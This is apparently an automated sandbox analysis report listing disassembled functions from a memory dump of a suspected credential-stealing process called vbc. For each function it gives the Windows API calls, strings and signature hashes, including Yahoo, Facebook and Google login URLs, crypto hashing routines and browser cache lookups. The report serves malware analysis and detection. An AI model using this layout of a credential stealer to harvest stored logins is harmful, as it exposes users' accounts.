                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                    • Opcode ID: 2f355c031f751b6a1ddc2a2edf890b8f78de2746b7ef95e2a6202f652ec718e5
                                                                                                                                                    • Instruction ID: d63233cf370321f654e877065783905421c71730e772143eb1ff94a20aa817f7
                                                                                                                                                    • Opcode Fuzzy Hash: 2f355c031f751b6a1ddc2a2edf890b8f78de2746b7ef95e2a6202f652ec718e5
                                                                                                                                                    • Instruction Fuzzy Hash: 4FE0927A900219A7DB205F60DC0DFC7B7BCEB41705F000170B945E2051EB34A7448BA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407475 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • malloc.MSVCRT ref: 00407491
                                                                                                                                                    • memcpy.MSVCRT ref: 004074A9
                                                                                                                                                    • free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                    • Opcode ID: a552214b4f396ffe3b978ec953857254dfa688d2005ab474b6786e0315961ce8
                                                                                                                                                    • Instruction ID: e360d5709d2f3202c1ca25caae3d4aa805c65bf3858a1f44a91d23c9b12a71fe
                                                                                                                                                    • Opcode Fuzzy Hash: a552214b4f396ffe3b978ec953857254dfa688d2005ab474b6786e0315961ce8
                                                                                                                                                    • Instruction Fuzzy Hash: FFF0E972A082229FD708EB75A94180B779DAF44364710442FF404E3281D738AC40C7A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0044233C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,0040FF66,?,?,00403292,?), ref: 0044234D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID: Lh@
                                                                                                                                                    • API String ID: 3664257935-1564020105
                                                                                                                                                    • Opcode ID: 9d0562313ed05c1077c8e865d76b3287021ad506fa066eb96027120c77a5f393
                                                                                                                                                    • Instruction ID: 76fd25b73cfe59c43d76c33e9e0e0ec1b0c89da13299cefcee144e01fa2b623b
                                                                                                                                                    • Opcode Fuzzy Hash: 9d0562313ed05c1077c8e865d76b3287021ad506fa066eb96027120c77a5f393
                                                                                                                                                    • Instruction Fuzzy Hash: 33E0F6B5900B008F93308F2BE944407FBF9BFE56113108E1FE4AAC2A24C3B4A6458F54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407B93 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: 5"D
                                                                                                                                                    • API String ID: 2738559852-199376320
                                                                                                                                                    • Opcode ID: ff886d5e1a4997402200634e3e0df398fd9a7f66ba8de1bb0dfe65b9a394ad27
                                                                                                                                                    • Instruction ID: b1f5ca1499e8e2fa5163bdfa5e58581682f5a8fdc606d8935362a09f0a3b37d8
                                                                                                                                                    • Opcode Fuzzy Hash: ff886d5e1a4997402200634e3e0df398fd9a7f66ba8de1bb0dfe65b9a394ad27
                                                                                                                                                    • Instruction Fuzzy Hash: 46D0923501020DBBDF018F80DC06B997B6DEB0575AF108054BA0095060C7759A10AB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004349F1 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: d
                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                    • Opcode ID: 35a79dfe1d1e81fc7e2dd898582a66ecb02311c77e20593106318d1c42a7929a
                                                                                                                                                    • Instruction ID: 01fd0a19dca965820be780cd5e1a180e940d32085fcd4292c33d665daa4a4ca3
                                                                                                                                                    • Opcode Fuzzy Hash: 35a79dfe1d1e81fc7e2dd898582a66ecb02311c77e20593106318d1c42a7929a
                                                                                                                                                    • Instruction Fuzzy Hash: B7819D716083519FCB10EF1AC84169FBBE0AFC8318F15592FF88497251D778EA85CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C5B3 Relevance: 3.1, APIs: 2, Instructions: 132COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
                                                                                                                                                      • Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,00000000,00000001,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040C5DC
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000), ref: 0040C6E9
                                                                                                                                                      • Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                                                                                                                      • Part of subcall function 004071BD: GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
                                                                                                                                                      • Part of subcall function 004071BD: _snwprintf.MSVCRT ref: 004071FE
                                                                                                                                                      • Part of subcall function 004071BD: MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1161345128-0
                                                                                                                                                    • Opcode ID: 437b4ee2f0eb5be7c77dedbcd6cde51050b7bc30ff96baad5e2726301dc593ae
                                                                                                                                                    • Instruction ID: 8008e0f7e2c68a0a7dbf7afa260ddf7c08443fea941bd9d01fd0dc6d198c04cd
                                                                                                                                                    • Opcode Fuzzy Hash: 437b4ee2f0eb5be7c77dedbcd6cde51050b7bc30ff96baad5e2726301dc593ae
                                                                                                                                                    • Instruction Fuzzy Hash: 82415F31B00100EBCB359F69C8C9E5E76A5AF45710F215A2BF406A73D1CB7AAD80CA5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E227 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                    • String ID: /stext
                                                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                                                    • Opcode ID: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
                                                                                                                                                    • Instruction ID: 5da650caeba3f583edd317abe6dc9e2273d49bc4fc560570e2d9775ed52fc578
                                                                                                                                                    • Opcode Fuzzy Hash: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
                                                                                                                                                    • Instruction Fuzzy Hash: 37218170B00105AFD704FFAA89C1A9DB7A9BF94304F1045BEE415F7382DB79AD218B59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040946C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcslen$FileFindFirst
                                                                                                                                                    • String ID: index.dat
                                                                                                                                                    • API String ID: 1858513025-427268347
                                                                                                                                                    • Opcode ID: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
                                                                                                                                                    • Instruction ID: ea6e303a67c95597c7ba2300e155a691c3aaaa96276431a044c3ae834a976286
                                                                                                                                                    • Opcode Fuzzy Hash: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
                                                                                                                                                    • Instruction Fuzzy Hash: 8601527180526999EB20E662CD426DE727CAF00314F1041BBA858F21D2EB3CDF868F4D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412B2E Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 00412B57
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: malloc
                                                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                                                    • Opcode ID: 5b5a248cf51c062ed88202fa4447692d12f7a24d46f4087129949bf54e3fefc0
                                                                                                                                                    • Instruction ID: 83e647f58a001b4b33716092e1dc9084e7a57e1649cb419fd0ecfe0012ae2b1c
                                                                                                                                                    • Opcode Fuzzy Hash: 5b5a248cf51c062ed88202fa4447692d12f7a24d46f4087129949bf54e3fefc0
                                                                                                                                                    • Instruction Fuzzy Hash: B1E026B7F4561267C2004F1AEC019866790AFC032171A063BF92CD7380D678E9A683A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414DE6 Relevance: 3.0, APIs: 2, Instructions: 24sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00414DFF
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,0045162C,00415453,00000008,00000000,00000000,?,00415610,?,00000000), ref: 00414E08
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1821831730-0
                                                                                                                                                    • Opcode ID: bdd47c3b9fe514102062cbc93d8af5e804c2569a959601c5796dc848db78b9f9
                                                                                                                                                    • Instruction ID: a5fc701692feba82469beb2995ebf65a4cce15204005db1f3291e32cb0673270
                                                                                                                                                    • Opcode Fuzzy Hash: bdd47c3b9fe514102062cbc93d8af5e804c2569a959601c5796dc848db78b9f9
                                                                                                                                                    • Instruction Fuzzy Hash: 95E0CD372006155FD7005B7CDCC09D77399AF85734725032AF261C3190C665D4424664
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041946A Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcmpmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1065087418-0
                                                                                                                                                    • Opcode ID: 025fdd92005a470daeaaf52f40e6be84491494a20acb6a1a3520ba0441d5af98
                                                                                                                                                    • Instruction ID: 09c6ddd7a7fbafff04f5e46546a8ec227a467f18660dcb1fea67ae87f7adc2a4
                                                                                                                                                    • Opcode Fuzzy Hash: 025fdd92005a470daeaaf52f40e6be84491494a20acb6a1a3520ba0441d5af98
                                                                                                                                                    • Instruction Fuzzy Hash: EB6170B1E05205FFDB11EFA489A09EEB7B8AB04308F14806FE108E3241D7789ED5DB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004098C2 Relevance: 2.6, APIs: 2, Instructions: 111COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                                                                                                                    • wcslen.MSVCRT ref: 00409901
                                                                                                                                                    • memset.MSVCRT ref: 00409980
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoadmemsetwcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1960736289-0
                                                                                                                                                    • Opcode ID: 4e256b32b087a2d54a013736d5ec90ac317bbbafb522d715d277fbd7e177f48e
                                                                                                                                                    • Instruction ID: eeeebaecff14eb5a2c3d0f3031068d4b6d2ebef8e1bb4496a3092dc18c5c1f6a
                                                                                                                                                    • Opcode Fuzzy Hash: 4e256b32b087a2d54a013736d5ec90ac317bbbafb522d715d277fbd7e177f48e
                                                                                                                                                    • Instruction Fuzzy Hash: C0318172510249BBCF11EFA5CCC19EE77B9AF48304F14887EF505B7282D638AE499B64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040ED6C Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EDFA: memset.MSVCRT ref: 0040EE42
                                                                                                                                                      • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE59
                                                                                                                                                      • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE61
                                                                                                                                                      • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EEBC
                                                                                                                                                      • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EECA
                                                                                                                                                      • Part of subcall function 0040797A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040EDAE,00000000,?,00000000,?,00000000), ref: 00407992
                                                                                                                                                      • Part of subcall function 0040797A: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004079A6
                                                                                                                                                      • Part of subcall function 0040797A: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004101ED), ref: 004079AF
                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 0040EDB8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcslen$File$Time$CloseCompareCreateHandlememset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4204647287-0
                                                                                                                                                    • Opcode ID: eeb16535b7e8d9903344e6e4fc87394a79dd4b2724dffbbd49d7f28440978fac
                                                                                                                                                    • Instruction ID: 7375e5b5c48a3cf746583bdb812c6cb833081a8f043ffb24ec2f547d3e817a13
                                                                                                                                                    • Opcode Fuzzy Hash: eeb16535b7e8d9903344e6e4fc87394a79dd4b2724dffbbd49d7f28440978fac
                                                                                                                                                    • Instruction Fuzzy Hash: 58114C72C00219ABCF11EBA5D9419DEBBB9EF44300F20047BE801F3280D634AF44CB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405149 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040511F,?,?,00000000,00000000,000000FF,0040571F,000000FF,000000FF,?,00000000,0040511F,?,?,?,0040566C), ref: 00405165
                                                                                                                                                      • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                    • Opcode ID: 8e3300ccc99ceaafd88bf63aedabe6f8cf4ec2b06029cc1f8c5137446a6ac1ce
                                                                                                                                                    • Instruction ID: 13fe659266928e09ca291fdb8c13dcfe3ff2a23a31d494a2ddaccb8188200d23
                                                                                                                                                    • Opcode Fuzzy Hash: 8e3300ccc99ceaafd88bf63aedabe6f8cf4ec2b06029cc1f8c5137446a6ac1ce
                                                                                                                                                    • Instruction Fuzzy Hash: 5CE0C736100100FFE6208F08CC06F6BBBF9EBC4B00F10883EB2A49A0B1C2326812CB24
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411B36 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32 ref: 00411B5D
                                                                                                                                                      • Part of subcall function 004119C6: memset.MSVCRT ref: 004119E5
                                                                                                                                                      • Part of subcall function 004119C6: _itow.MSVCRT ref: 004119FC
                                                                                                                                                      • Part of subcall function 004119C6: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00411A0B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                    • Opcode ID: 4eb565fe38f19d9fcd3ef397b8be022b0e8b2ee90877df68a8cf7ef72faf0ee1
                                                                                                                                                    • Instruction ID: e4974885a9e011c02de9f8347c72c3dce1736aa6ad634daf2893e710d343c839
                                                                                                                                                    • Opcode Fuzzy Hash: 4eb565fe38f19d9fcd3ef397b8be022b0e8b2ee90877df68a8cf7ef72faf0ee1
                                                                                                                                                    • Instruction Fuzzy Hash: ABE0B672000149AFDF125F80EC01AA97BA6FF04315F248459FA5805631D73695B0EB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411376 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0041139E: LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED
                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0041126B,00000104,0041126B,00000000,?), ref: 00411395
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$FileLibraryLoadModuleName
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3821362017-0
                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                    • Instruction ID: 161ab63227dca0468342f2fd6fc01eeb5e2c53d4d8b5c6eb41d2cf02796b8335
                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                    • Instruction Fuzzy Hash: B3D0A9312183196BE220AB708C00FABA3E86B40710F008C2ABAA0D68A8D264C8805354
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407BB2 Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040C605,00000000,00448B84,00000002,?,?,?,0040E2DC,00000000), ref: 00407BC9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                    • Opcode ID: d369bb92ad7c49a717be8c21899150b55a2c28b5f26bff8a5462d106715fcbd8
                                                                                                                                                    • Instruction ID: 7a92458e03063ade3ff171a8f73d1b131da45bdd434acd56d38c8090c64c1cda
                                                                                                                                                    • Opcode Fuzzy Hash: d369bb92ad7c49a717be8c21899150b55a2c28b5f26bff8a5462d106715fcbd8
                                                                                                                                                    • Instruction Fuzzy Hash: 47D0C93511020DFBDF01CF80DC06FDD7B7DEB04759F108054BA1495060D7B59B14AB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407144 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
                                                                                                                                                    • Instruction ID: 81d2dec17d2b84b4128be66cdd24e97b0dbf61b8fa3bcd6fd5fd384be9d73f32
                                                                                                                                                    • Opcode Fuzzy Hash: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
                                                                                                                                                    • Instruction Fuzzy Hash: E4C092B0240201BEFF228B10ED16F36695CD740B01F2044247E00E40E0D1A04F108924
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040715D Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                                                                                                                    Memory Dump Source
